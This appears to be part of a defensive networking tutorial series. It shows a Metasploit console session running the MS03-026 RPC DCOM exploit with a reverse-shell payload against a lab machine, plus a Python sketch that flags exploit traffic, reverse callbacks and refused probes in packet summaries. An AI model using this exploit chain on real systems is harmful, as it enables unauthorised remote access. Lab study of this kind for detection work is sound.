Packet analysis tools and methodology (Part 3)

On the offensive with Metasploit!

We have seen over the course of the past two articles that there is a variety of port scans one can accomplish via some well-known tools. We have also covered some of the better known programs that network security analysts use in an attempt to secure their respective networks. This all leads us to a tool that you may have read about before in an article of mine: the Metasploit Framework. Due to its many exploits, payloads, and other advanced features, this tool is quickly gaining in popularity. It is popular not only with security professionals, but also with some other elements of the computer world who do not have your best interests at heart.

The malicious hackers who have adopted this tool, due to its relative ease of use and powerful features, have a powerful weapon at their disposal. It should be evident to them, though, that each exploit in the framework comes with a ready-made intrusion detection signature built into it. When this tool was designed, its creators, HDM and spoonm, were ethical enough to insert an ASCII signature that intrusion detection vendors could easily build a signature around. That way the tool is easily detectable when seen by an IDS. Over the course of this article several examples of this ASCII signature will be shown.

In the interests of better understanding how your networks could be compromised, we will attack a computer in my home lab. Various attacks will be shown, both successful and unsuccessful. Shown as well will be the syntax usage for one of the attacks. Learning to use this tool is relatively easy. One needs to remember as well that there are only so many ways to compromise a computer. The great majority of them continue to revolve around application layer protocols such as HTTP and FTP. That is for the simple reason that these protocols must be accessible through the firewall for them to be used. It would be hard to target a protocol the operating system uses internally if it does not listen for inbound connections. In other words, you cannot really target something that is not listening.

Is anyone listening?

The following examples that we will use all have listening sockets. These services will be RPC, LSASS, and HTTP. We will also use some exploits that will purposely fail, because there is no service listening to be exploited. That way we will be able to see, at the packet level, what a failed attempt looks like. It is important to recognize not only a successful intrusion attempt, but also an unsuccessful one. So with that in mind, let's set up our first exploit to be done via Metasploit. If you have read some of my earlier articles you will realize that Metasploit can be used in either win32 or Linux. I will show the sequence of events done to configure Metasploit for the first exploit so that all you need to do is emulate it for the remainder of the exploits. Please see the notes below for detailed instructions on how to use this program.

[email protected]:~/framework-2.2> ./msfconsole

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/  v2.2    \/     \/ |__|
+ -- --=[ msfconsole v2.2 [33 exploits - 33 payloads]

msf >

((Listed above is how you invoke the msfconsole within the framework directory))

msf > show exploits

Metasploit Framework Loaded Exploits

Credits                     Metasploit Framework Credits
afp_loginext              AppleFileServer LoginExt PathName Buffer Overflow
apache_chunked_win32      Apache Win32 Chunked Encoding
blackice_pam_icq          ISS PAM.dll ICQ Parser Buffer Overflow
distcc_exec               DistCC Daemon Command Execution
exchange2000_xexch50      Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail                IA WebMail 3.x Buffer Overflow
icecast_header            Icecast (<= 2.0.1) Header Overwrite (win32)
iis50_nsiislog_post       IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow    IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll        IIS 5.0 WebDAV ntdll.dll Overflow

((typing in the above "show exploits" will give you a list of available exploits; this is only a partial list, for I have snipped out the bulk for brevity's sake))

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 >  

((once you have decided which exploit to use you will type "use" followed by the actual exploit name as it appears, just like the above noted example))

msf msrpc_dcom_ms03_026 > show options

Exploit Options

Exploit:  Name    Default  Description
--------  ------  -------  ------------------
required  RHOST            The target address
required  RPORT   135      The target port

Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026 >        

((typing in the "show options" command will give you a partial list of options you will need to fill in, like LHOST (i.e. localhost, or your attacking computer's IP address) and RHOST (the victim computer's IP address)))

msf msrpc_dcom_ms03_026 > set RHOST
msf msrpc_dcom_ms03_026 > set LHOST
msf msrpc_dcom_ms03_026 >        

((you will now set the options as shown above))

msf msrpc_dcom_ms03_026 > show payloads

Metasploit Framework Usable Payloads

win32_adduser              Windows Execute net user /ADD
win32_bind               Windows Bind Shell
win32_bind_dllinject     Windows Bind DLL Inject
win32_bind_stg           Windows Staged Bind Shell
win32_bind_stg_upexec    Windows Staged Bind Upload/Execute
win32_bind_vncinject     Windows Bind VNC Server DLL Inject
win32_exec               Windows Execute Command
win32_reverse            Windows Reverse Shell
win32_reverse_dllinject  Windows Reverse DLL Inject
win32_reverse_stg        Windows Staged Reverse Shell
win32_reverse_stg_ie     Windows Reverse InlineEgg Stager
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject  Windows Reverse VNC Server DLL Inject

((typing in "show payloads" will give you an extensive list of available payloads to attach to the exploit, and this is where Metasploit really shines above other such tools))

msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) >          

((once you have picked your payload type, enter it as seen above))

msf msrpc_dcom_ms03_026(win32_reverse) > show options
Exploit and Payload Options

Exploit:  Name      Default  Description
--------  --------  -------  ------------------
required  RHOST              The target address
required  RPORT     135      The target port

Payload:  Name      Default  Description
--------  --------  -------  ------------------------------------------
optional  EXITFUNC  seh      Exit technique: "process", "thread", "seh"
required  LHOST              Local address to receive connection
required  LPORT     4321     Local port to receive connection

Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_reverse) >             

((when you type "show options" again you will see that they have all been filled in with the information required))

msf msrpc_dcom_ms03_026(win32_reverse) > set TARGET 0

((the last thing I do is set the target field, which as seen above encompasses pretty much all win32 operating systems))

msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Connected to REMACT with group ID 0x80b3
[*] Got connection from
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

((lastly, as seen above, I type in "exploit" to launch the actual exploit itself, and I indeed do get the reverse shell prompt as seen above))

What this has shown us is that a tool as powerful as Metasploit Framework is relatively easy to use. This really is helpful in letting us recognize what certain exploits look like at the packet level. I have said it before and I will say it again, you will always need to refer to the actual packets themselves to ascertain if a system breach has occurred.
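As an added illustration, not part of the original article, the Python sketch below shows how the three things this series asks you to recognize at the packet level can be told apart from a list of packet summaries: a data segment carrying the framework's ASCII marker, the victim's connection back to the handler on the default LPORT 4321, and a probe against a port with nothing listening (a SYN answered by RST/ACK). The marker string, the addresses and the packets themselves are constructed placeholders; the page does not quote the real signature, so SIGNATURE is an assumption.

```python
from dataclasses import dataclass

# Assumption: the page does not quote the framework's ASCII marker, so a
# constructed placeholder stands in for it here.
SIGNATURE = b"MSF-ASCII-MARKER-PLACEHOLDER"
HANDLER_PORT = 4321  # default LPORT of the win32_reverse payload shown above

@dataclass
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    flags: str          # TCP flags as letters: S, SA, RA, PA
    payload: bytes = b""

def classify(packets):
    """Walk packets in capture order and return (verdict, detail) findings."""
    findings = []
    syns = {}       # unanswered SYNs keyed by (src, dst, sport, dport)
    targeted = {}   # victim -> attacker, set once a marked payload is seen
    for p in packets:
        if p.flags == "S":
            syns[(p.src, p.dst, p.sport, p.dport)] = p
            # A fresh SYN from an attacked host back to the attacker's handler
            # port is the shape of the reverse-shell callback.
            if targeted.get(p.src) == p.dst and p.dport == HANDLER_PORT:
                findings.append(("reverse_callback", f"{p.src} -> {p.dst}:{p.dport}"))
        elif p.flags == "RA":
            # RST/ACK answering a SYN: the probe hit a port with no listener.
            probe = syns.pop((p.dst, p.src, p.dport, p.sport), None)
            if probe is not None:
                findings.append(("refused", f"{probe.src} -> {probe.dst}:{probe.dport}"))
        elif p.flags == "PA" and SIGNATURE in p.payload:
            # Data segment carrying the framework's ASCII marker.
            findings.append(("exploit_payload", f"{p.src} -> {p.dst}:{p.dport}"))
            targeted[p.dst] = p.src
    return findings

# Constructed sample traffic: attacker 10.0.0.5, lab victim 10.0.0.9.
SAMPLE = [
    Packet("10.0.0.5", "10.0.0.9", 40001, 135, "S"),
    Packet("10.0.0.9", "10.0.0.5", 135, 40001, "SA"),
    Packet("10.0.0.5", "10.0.0.9", 40001, 135, "PA", b"rpc-bind-bytes" + SIGNATURE),
    Packet("10.0.0.9", "10.0.0.5", 50123, HANDLER_PORT, "S"),
    Packet("10.0.0.5", "10.0.0.9", 40002, 21, "S"),   # FTP probe, nothing listening
    Packet("10.0.0.9", "10.0.0.5", 21, 40002, "RA"),
]
```

Calling classify(SAMPLE) yields one exploit_payload, one reverse_callback and one refused finding, in that order; in practice the Packet records would be filled from a decoded capture rather than typed in.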

Due to this, it is very helpful if you can recognize an exploit for what it is. There is no better way to do that than to actually pull some off yourself in a lab environment. I have gone ahead and run several other exploits for the last part of this article series. In the next, and last, part we will use some of the tools we visited earlier. These tools will help us investigate the binary log that I will have generated for you, for in the last part of this article series we will parse the binary log file through Snort and SnortSnarf. That will give us a friendly HTML file to investigate the Snort output. Till then!
